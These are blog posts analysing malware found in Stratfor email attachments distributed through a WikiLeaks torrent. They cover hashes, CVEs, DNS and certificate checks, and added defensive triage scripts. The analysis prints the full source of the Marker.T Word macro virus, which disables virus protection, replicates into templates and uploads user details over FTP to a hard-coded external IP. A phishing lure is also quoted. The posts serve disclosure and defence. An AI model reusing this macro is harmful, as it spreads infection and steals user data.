Tuesday, March 31, 2015

Wikileaks Malware Analysis Continued

Yesterday I released a blog post in which I explained that at least one Wikileaks property, wlstorage.net, is distributing a series of malicious programs as part of a torrent file dump related to the Global Intelligence Files retrieved from Stratfor by Jeremy Hammond and several others.

I am slowly going through the malicious files in order to better understand what they are attempting to do. The work primarily involves extracting Visual Basic macros and OLE structures from documents, then disassembling the executables scraped out of the payload documents. Even for files using well-documented exploits, as many of these are, this is slow and tedious work, and I invite readers experienced in security research to contact me to offer assistance.

One such executable retrieved from the Stratfor files is gifiles-2014\gifiles\attach\151\151784_Command.com. As with the files reviewed yesterday, it was retrieved from the gifiles-2014.tar.bz2.torrent file downloaded from wlstorage.net, which resides on the same servers as wikileaks.org. I have disassembled this executable using Heaventools' PE Explorer and Hex-Rays IDA, and have determined that the file contains a variant of the Magistr worm. However, this version seems to have a number of features that I have not seen in the literature concerning Magistr (NOTE: there are numerous versions of this worm, and this one has likely been seen before by someone).

The program imports the following DLLs to call its various functions:

KERNEL32.dll
USER32.dll
COMCTL32.dll
WININET.dll
cmpbk32.dll
cmutil.dll

The program adds an entry for itself in the Microsoft Connection Manager Phone Books and uses that entry to establish both FTP and HTTP connections. I am still working on where the connections head to.
Screenshot: The program loads the MSCM Phone Book
Screenshot: Connection Manager is used to establish an FTP connection and transfer files
Screenshot: HTTP connections are established as well
The malicious program appears to pass itself off as a program called iPassConnect by creating references to the following files:

PBUPDATE.PBD
PBUPDATE.EXE
PBUPDATE.INF
PBUPDATE.VER

Here is one such reference:

Screenshot: PBUPDATE.EXE is associated with iPassConnect
I will continue the testing of this application and update this post when I nail down where these connections are going to.

I am more than happy to share more comprehensive information concerning my research, so feel free to email me if you would like to help out.

I have also contacted Wikileaks (to the best of my ability) to warn them of the dangerous files being distributed on wlstorage.net. For a number of reasons they are not the easiest people to get hold of, particularly in relation to technical issues, and I do not know anyone directly affiliated with the group. If someone reading this post does have a more direct means of communication with Wikileaks, please provide them with this information ASAP!

Monday, March 30, 2015

Wikileaks Global Intelligence File Dump is Loaded With Malicious Software

Click here for the second post on this topic, which includes more detailed technical information.

Hector Monsegur, formerly Sabu of LulzSec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.

In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.

This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.

Beginning on February 27, 2012, the controversial news organization Wikileaks published a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc. (more widely known as Stratfor). The publication began with 200 emails, and Wikileaks progressively published more through the final publication date of July 18, 2014, when a single file containing over 5 million emails was released.

The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources indicate that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreword in an attempt to explain the history of the documents, which is still contested.)

It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office in New York during the nine-month period in which #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents reference a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.

The content of the emails, though of obvious political and social significance, is not relevant to this post. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak are malicious: they are designed to, among other things, retrieve detailed information about the computers that open them and send it to a variety of remote systems.

My research is still in progress, but the wide circulation of this data and the apparent lack of any notification of the danger in these files have convinced me to publish what little I have found immediately.

I ought to be clear from the outset: I have no information linking Wikileaks, Assange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files, or who have already downloaded them, understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files, that would be a bonus.

The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain, wlstorage.net. While the domains are separate, wlstorage.net is linked directly from the Wikileaks Global Intelligence Files web page (at https://wikileaks.org/gifiles), and the two domains share the same SSL certificate and the same IP addresses. This would seem to (but does not entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users into downloading the malicious files.


# host wikileaks.org
wikileaks.org has address 195.35.109.53
wikileaks.org has address 91.218.114.210
wikileaks.org has address 91.218.244.152
wikileaks.org has address 95.211.113.131
wikileaks.org has address 95.211.113.154
wikileaks.org has address 195.35.109.44
wikileaks.org mail is handled by 1 mx.wikileaks.org.

# host wlstorage.net
wlstorage.net has address 91.218.114.210
wlstorage.net has address 91.218.244.152
wlstorage.net has address 95.211.113.131
wlstorage.net has address 95.211.113.154
wlstorage.net has address 195.35.109.44
wlstorage.net has address 195.35.109.53

Screenshot: The Wikileaks.Org Global Intelligence Files web page
Screenshot: The link to wlstorage.net from Wikileaks
The link to wlstorage.net points to a list of torrent files. As mentioned previously, Wikileaks began with a small initial leak of documents and released progressively more. Each of these torrents is a different version of the leak, which over time grew to include more and more files as they were apparently reviewed by the Wikileaks team. Notice that the very last torrent uses a different compression method and file nomenclature than the rest. It is this last file, and this file only, in which I have identified malware.
Screenshot: The Global Intelligence Files torrent files on wlstorage.net
The SSL certificate served by both domains is the same. Note that its subject is the wildcard *.wikileaks.org, which on its own does not match wlstorage.net (a wildcard covers a single label within the same domain); whether a client accepts it for wlstorage.net depends on the certificate's subjectAltName entries, which the output below does not show (openssl x509 -noout -text | grep -A1 'Subject Alternative Name' will list them):
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA
subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org
notBefore=Oct 14 00:00:00 2013 GMT
notAfter=Oct 14 23:59:59 2015 GMT
00b5f826
SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32

# echo |\
> openssl s_client -connect wikileaks.org:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
(PEM body omitted)
-----END CERTIFICATE-----


# echo |\
> openssl s_client -connect wlstorage.net:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
(PEM body omitted)
-----END CERTIFICATE-----
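As an added example (not part of the original post), here is a small Python script that applies the two checks above offline: it parses the `host` answers quoted above and reports the addresses the two names share, and it applies the hostname matching rules clients use to a certificate name, which makes the *.wikileaks.org subject visible as a non-match for wlstorage.net. The `host` outputs are the ones above; the subjectAltName list passed in the last call is a constructed placeholder, not something read from the real certificate.

```python
"""Added example (not from the post): compare `host` answers for two names
and check whether a certificate name actually covers a hostname.
The two `host` outputs are the ones quoted in the post; the subjectAltName
list used at the bottom is a constructed placeholder."""
import re

HOST_WIKILEAKS = """\
wikileaks.org has address 195.35.109.53
wikileaks.org has address 91.218.114.210
wikileaks.org has address 91.218.244.152
wikileaks.org has address 95.211.113.131
wikileaks.org has address 95.211.113.154
wikileaks.org has address 195.35.109.44
wikileaks.org mail is handled by 1 mx.wikileaks.org.
"""

HOST_WLSTORAGE = """\
wlstorage.net has address 91.218.114.210
wlstorage.net has address 91.218.244.152
wlstorage.net has address 95.211.113.131
wlstorage.net has address 95.211.113.154
wlstorage.net has address 195.35.109.44
wlstorage.net has address 195.35.109.53
"""

ADDR_RE = re.compile(r"^\S+ has (?:IPv6 )?address (\S+)$", re.MULTILINE)


def parse_host_output(text):
    """Set of addresses in `host` output; MX and other record lines are ignored."""
    return set(ADDR_RE.findall(text))


def shared_addresses(out_a, out_b):
    return parse_host_output(out_a) & parse_host_output(out_b)


def hostname_matches(pattern, hostname):
    """Name matching as browsers apply it (RFC 6125 style): a wildcard is only
    honoured as the entire left-most label, it matches exactly one label, and
    it never matches the bare domain ('*.wikileaks.org' != 'wikileaks.org')."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or any("*" in lbl for lbl in p_labels[1:]):
        return False
    return len(h_labels) == len(p_labels) and h_labels[1:] == p_labels[1:]


def cert_covers(hostname, subject_cn, dns_sans=()):
    """Clients check subjectAltName DNS entries first and fall back to the
    subject CN only when the certificate carries no DNS SANs at all."""
    candidates = list(dns_sans) or [subject_cn]
    return any(hostname_matches(c, hostname) for c in candidates)


if __name__ == "__main__":
    print("shared A records:", sorted(shared_addresses(HOST_WIKILEAKS, HOST_WLSTORAGE)))
    print("CN *.wikileaks.org covers wlstorage.net?",
          cert_covers("wlstorage.net", "*.wikileaks.org"))
    # constructed SAN list: what the certificate would need for wlstorage.net to validate
    print("with a SAN for wlstorage.net:",
          cert_covers("wlstorage.net", "*.wikileaks.org", ["*.wikileaks.org", "wlstorage.net"]))
```

To run it against the live hosts, feed it fresh `host` output and the DNS entries from `openssl x509 -noout -text`; the matching logic is the same.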

I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z and gifiles-2014.tar.bz2. I was unable to identify any malware in gifiles-20121104151320.7z, which is notable for a number of reasons. Each of these files is massive: gifiles-20121104151320.7z is close to 3 GB compressed, and gifiles-2014.tar.bz2 is roughly 9x that size. The two files were also packaged differently. 7-Zip, a compression program used mostly on Windows, was used to make every gifiles torrent dump except gifiles-2014.tar.bz2, which is a tar archive compressed with bzip2, the usual combination on Linux and other Unix-like systems (and available on Windows as well). It is reasonable to assume that gifiles-2014.tar.bz2 was created with different tooling, and plausibly on a different computer, than all of the other distributions.

I've identified the following exploits, malware families and antivirus detection names in the dump:


MARKER.T 
CVE-2006-2492
CVE-2009-0557
CVE-2011-0611
CVE-2010-3333
HEAPSPRAY
Mydoom
Magistr
Pdfjsc.BP
Wordjmp.gen
Mimail

The software vulnerable to these exploits is (version omitted while research is in progress): 

Adobe Acrobat
Adobe Flash Player
ActiveX
Microsoft Office
Microsoft Office for Mac
Open XML File Format Converter

These exploits are contained in the following files:

gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc
gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc
gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc
gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf
gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls
gifiles-2014\gifiles\attach\117\117687_Lithium.doc
gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc
gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc
gifiles-2014\gifiles\attach\47\47247_US Congress re.doc
gifiles-2014\gifiles\attach\47\47329_US Congress re.doc
gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf
gifiles-2014\gifiles\attach\151\151784_Command.com
gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip)
gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe
gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc
gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip)
gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe
gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip)
gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe
gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf

These attachments are just phishing nonsense and don't contain malicious software, but if you scan this dump with an antivirus they may cause a positive:

gifiles-2014\gifiles\docs\34\3485657_your-friend-cj-saw-miniture-tesla-generator-in-action-live.html
gifiles-2014\gifiles\attach\20\20497_PP-001-460-891-520.html

I have been working on extracting the payloads from the .DOC files first, before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 117793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:

117687_Lithium.doc
md5 6451dc0fc47122e75e3af66c9547d420
sha1 88eaf2aaa211d761c190d310d181f9f4e8d3853b
sha256 34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2

117793_Hybrid write-up.doc
md5 87114142e32fd455b525c900e4342475
sha1 cfda55de190f6b71434b4a4b66b2a372773133db
sha256 9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358

117870_Hybrid write-up2.doc
md5 6fde4a58f42deba3613030cbb93aef2b
sha1 07191e232304f3c7853e18916bb89f8af4cda3b1
sha256 32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655

Each of these three documents contains the following VBA macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
  End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
  'Infect the NormalTemplate
  If DocumentInfected = True Then
    SaveNormalTemplate = NormalTemplate.Saved
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
      'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i
    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    If SaveNormalTemplate = True Then NormalTemplate.Save
  End If
  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
    SaveDocument = ActiveDocument.Saved
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    If SaveDocument = True Then ActiveDocument.Save
  End If
End If
End Sub

We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 209.201.88.110, which looks like it is assigned to a Vietnamese restaurant in New Jersey.

Using OfficeMalScanner provides further information:


[*] SCAN mode selected
[*] Opening file 117870_Hybrid write-up2.doc
[*] Filesize is 604672 (0x93a00) Bytes
[*] Ms Office OLE2 Compound Format document detected
[*] Scanning now...
             +++++ decryption loop detected at offset: 0x00019eb8 +++++


33C9 xor ecx, ecx
E7EE out EEh, eax
2974E835 sub [eax+ebp*8+35h], esi
79F7 jns $-07h
34A2 xor al, A2h
12F5 adc dh, ch
72F7 jb $-07h
94 xchg esp, eax
BA0EE6EEA9 mov edx, A9EEE60Eh
7909 jns $+0Bh
E615 out 15h, al
774F jnbe $+51h
51 push ecx
B42F mov ah, 2Fh
EE out dx, al
9E sahf 
--------------------------------------------------------------------------


Brute-forcing for encrypted PE- and embedded OLE-files now...
Bruting XOR Key: 0x01
....
Analysis finished!

------------------------------------------------------------------------
117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10
------------------------------------------------------------------------

OfficeMalScanner suggests there may be an additional, encrypted payload in these files beyond the VBA macro that sits on top. Treat this as a lead rather than a finding for now: the "decryption loop" heuristic fires on byte patterns, and the disassembly it prints above contains port I/O (out) and other instructions that make no sense in user-mode shellcode, which is what a false positive on document data looks like. Confirming or ruling out a second payload will take me a bit more time.
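The "Bruting XOR Key" pass above works by trying every single-byte key and looking for an executable in the result. As an added example (my code, not OfficeMalScanner's and not from the original post), the following Python does the same thing offline against a constructed document: rather than decoding the file 255 times it XOR-encodes a string every PE carries and searches for that, then checks that the candidate really decodes to an MZ header whose e_lfanew points at "PE\0\0", which is the kind of confirmation that separates a real hit from a heuristic false positive.

```python
"""Added example (not from the post and not OfficeMalScanner's code): the idea
behind the 'Bruting XOR Key' pass. Instead of decoding the whole document 255
times, XOR-encode a string every PE carries and search for that, then confirm
the candidate really decodes to an MZ/PE header. The document blob is
constructed here; real samples belong in a VM."""
import struct

DOS_STUB = b"This program cannot be run in DOS mode"


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def looks_like_pe(decoded):
    """Cheap structural check: 'MZ', then a sane e_lfanew pointing at 'PE\\0\\0'."""
    if len(decoded) < 0x40 or decoded[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", decoded, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(decoded) - 4 and decoded[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def _locate_mz(data, key, stub_pos):
    """In a standard DOS header the stub string begins at 0x4e; otherwise fall
    back to the nearest encoded 'MZ' within 512 bytes before the string."""
    mz = xor_bytes(b"MZ", key)
    if stub_pos >= 0x4E and data[stub_pos - 0x4E:stub_pos - 0x4C] == mz:
        return stub_pos - 0x4E
    start = data.rfind(mz, max(0, stub_pos - 0x200), stub_pos)
    return None if start == -1 else start


def find_xored_pe(data):
    """One hit per (key, stub occurrence) for single-byte keys 1..255.
    Key 0 (plaintext) is deliberately skipped: that case is what a normal
    'MZ' search already catches."""
    hits = []
    for key in range(1, 256):
        probe = xor_bytes(DOS_STUB, key)
        pos = data.find(probe)
        while pos != -1:
            start = _locate_mz(data, key, pos)
            decoded = xor_bytes(data[start:start + 0x400], key) if start is not None else b""
            hits.append({"key": key, "offset": start, "valid_pe": looks_like_pe(decoded)})
            pos = data.find(probe, pos + 1)
    return hits


def _fake_pe():
    """Minimal header: MZ, e_lfanew -> 0x80, stub string at 0x4e, 'PE\\0\\0' at 0x80."""
    hdr = bytearray(0x100)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x4E:0x4E + len(DOS_STUB)] = DOS_STUB
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr)


# constructed document: OLE2 magic, 512 zero bytes, then the fake PE XOR-encoded with 0x5a
SAMPLE_DOC = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 512
              + xor_bytes(_fake_pe(), 0x5A) + b"\x00" * 64)

if __name__ == "__main__":
    for hit in find_xored_pe(SAMPLE_DOC):
        print("key=0x%02x offset=%s valid_pe=%s" % (hit["key"], hit["offset"], hit["valid_pe"]))
```

On a real document, a hit with valid_pe set to False is the same kind of weak signal as the disassembly above; a hit with it set to True is worth carving out at that offset and hashing.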

In addition to these three files I have also been working on a fourth, 6566_TheSplitBetw.doc, which makes use of a different set of exploits. Don't be fooled by the .DOC extension: this is an RTF file, and it uses a classic RTF exploit, CVE-2010-3333.

md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38
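Because the extension can't be trusted (the .doc above is RTF, and the zipped attachments listed earlier carry .exe files), the first triage step is to classify each attachment by its leading bytes and record the same three hashes listed above. The following Python is an added example, not code from the original post; the two file contents it runs on are constructed stand-ins, and only the file names come from the post.

```python
"""Added example (not from the post): identify attachment containers by their
magic bytes instead of the extension and compute the three hashes the post
lists. The two sample blobs below are constructed stand-ins, not the real
attachments; the file names are the ones the post mentions."""
import hashlib

# (magic prefix, container type), tested in this order
MAGIC = [
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),   # legacy .doc/.xls/.ppt compound file
    (b"{\\rtf", "rtf"),                              # what 6566_TheSplitBetw.doc really is
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),                          # OOXML (.docx) or a plain zip
    (b"MZ", "pe"),                                   # DOS/PE executable
]

# what an honest file with this extension should start with
EXPECTED = {"doc": "ole2", "xls": "ole2", "ppt": "ole2", "pdf": "pdf",
            "zip": "zip", "docx": "zip", "xlsx": "zip", "exe": "pe"}


def identify(data):
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def hashes(data):
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def triage(filename, data):
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = identify(data)
    expected = EXPECTED.get(ext)
    return {
        "file": filename,
        "container": kind,
        # an RTF named .doc (or a PE named .jpg.exe inside a zip) is worth a closer look
        "extension_mismatch": expected is not None and kind != expected,
        **hashes(data),
    }


# constructed samples
SAMPLE_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Times;}}\\par placeholder\\par}"
SAMPLE_OLE = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504

if __name__ == "__main__":
    for name, blob in [("6566_TheSplitBetw.doc", SAMPLE_RTF), ("117687_Lithium.doc", SAMPLE_OLE)]:
        print(triage(name, blob))
```

Run it over the whole attach tree and the mismatch flag gives a short list to look at first; the hashes let you compare against the values above and against VirusTotal without re-uploading the files.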

This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:

-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com] 
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest


Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below.  Article appeared as a straight Q and A story, everything reads balanced and fair.  Please let me know if you have any questions or concerns.

V/r,
Courtney

The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.


Also in May 2011, the same exploit was used in an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified", which was sent to a significant number of US government email addresses.

Both times the payload was different. A Metasploit module exists for this exploit, and Microsoft patched the underlying vulnerability in 2010 (MS10-087).

I've been working on reverse engineering this code as well. This file does not contain VBA macros. The most interesting tidbit I have found, apart from what is already well documented about this exploit, was recovered by scraping a bit of the shellcode using a Python extraction script provided by Alexander Hanel (embedded from GitHub; Mr Hanel did not collaborate on this project):


This is what was recovered (also embedded from GitHub):



I am still in the process of investigating this however I am particularly interested in the creation of an executable, C:\a.exe as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:

"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."

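Alexander Hanel's extraction script is embedded above rather than reproduced here. As an added example of the same general technique (my code, not his and not from the original post), the Python below pulls every long hex run out of an RTF, records which control word introduced it, and lists the printable strings in the decoded bytes; that is how names like C:\a.exe and Tripolitania.RTF surface from an RTF-borne payload. The RTF it scans is constructed with a harmless stand-in blob; only the two file names in it are taken from the post.

```python
"""Added example (not from the post, and not Alexander Hanel's script): pull
the hex-encoded blobs out of an RTF file, note which control word introduced
each one (\\objdata for embedded objects, \\sv inside a pFragments shape for
CVE-2010-3333 style documents) and list the printable strings inside. The
RTF below is constructed; the two file names in it are taken from the post."""
import re

HEX_RUN = re.compile(rb"(?:[0-9A-Fa-f]{2}\s*){16,}")   # 16+ hex bytes, whitespace allowed
CONTROL_WORD = re.compile(rb"\\([A-Za-z]+)-?\d* ?")


def hex_runs(rtf):
    """Yield (offset, decoded bytes) for every long run of hex digits."""
    for m in HEX_RUN.finditer(rtf):
        cleaned = re.sub(rb"\s+", b"", m.group(0))
        if len(cleaned) % 2:          # drop a dangling nibble
            cleaned = cleaned[:-1]
        yield m.start(), bytes.fromhex(cleaned.decode("ascii"))


def ascii_strings(blob, min_len=6):
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def scan_rtf(rtf):
    results = []
    for offset, blob in hex_runs(rtf):
        words = CONTROL_WORD.findall(rtf[:offset])   # last control word before the run
        results.append({
            "offset": offset,
            "control_word": words[-1].decode("ascii") if words else "",
            "size": len(blob),
            "looks_like_pe": blob.startswith(b"MZ"),
            "strings": ascii_strings(blob),
        })
    return results


# constructed sample: a harmless stand-in blob hidden in an \objdata stream
FAKE_OBJECT = b"MZ" + b"\x90" * 20 + b"C:\\a.exe\x00" + b"Tripolitania.RTF\x00" + b"\x00" * 8
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Times;}}\n"
    b"\\par Visible body text.\\par\n"
    b"{\\object\\objemb{\\*\\objdata " + FAKE_OBJECT.hex().encode("ascii") + b"}}\n"
    b"}"
)

if __name__ == "__main__":
    for r in scan_rtf(SAMPLE_RTF):
        print(r)
```

For a pFragments document the interesting run follows \sv rather than \objdata, and the decoded bytes are the overflow data plus shellcode rather than an embedded file, so expect the strings to be URLs, drop paths and API names rather than a complete executable.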
At this point very few conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified here as infected with malware as part of their coverage of these document leaks. It is possible, for example, to search and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few are taken by the end user, who expects this content to be sanitized before a media organization provides it.

When downloading and viewing these files, most people are trying to protect themselves from surveillance, things like the NSA's XKEYSCORE. Few users expect the leaked files themselves to be a threat. While there is overlap between the sort of precautions that protect a computer against outside surveillance and those that protect against infected files, there are significant differences. For example, air gapping can be an effective deterrent against surveillance and against some of the worst features of malware. However, the threat from surveillance is often considered transitory: after performing the task that needs to be protected from prying eyes, a user might not find it unreasonable to break their air gap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a networked one. All such activity is easily exploited by malicious software. To use a somewhat related analogy: Tor won't protect you from a keylogger.

This is why notification of malicious software in these files is important: so users can adjust their operational security plans to account for it.

There are a number of theories that could account for the presence of this malicious software. Perhaps the least wild-eyed of them is that Stratfor employees were receiving these malicious files through email. Whether or not those employees did anything with them, the files could have been retrieved by LulzSec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that roughly two years (from the time they were received by WL sometime around 2012 to their complete publication in 2014) was not long enough to properly review and sanitize the files.

That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.

This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" is of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.

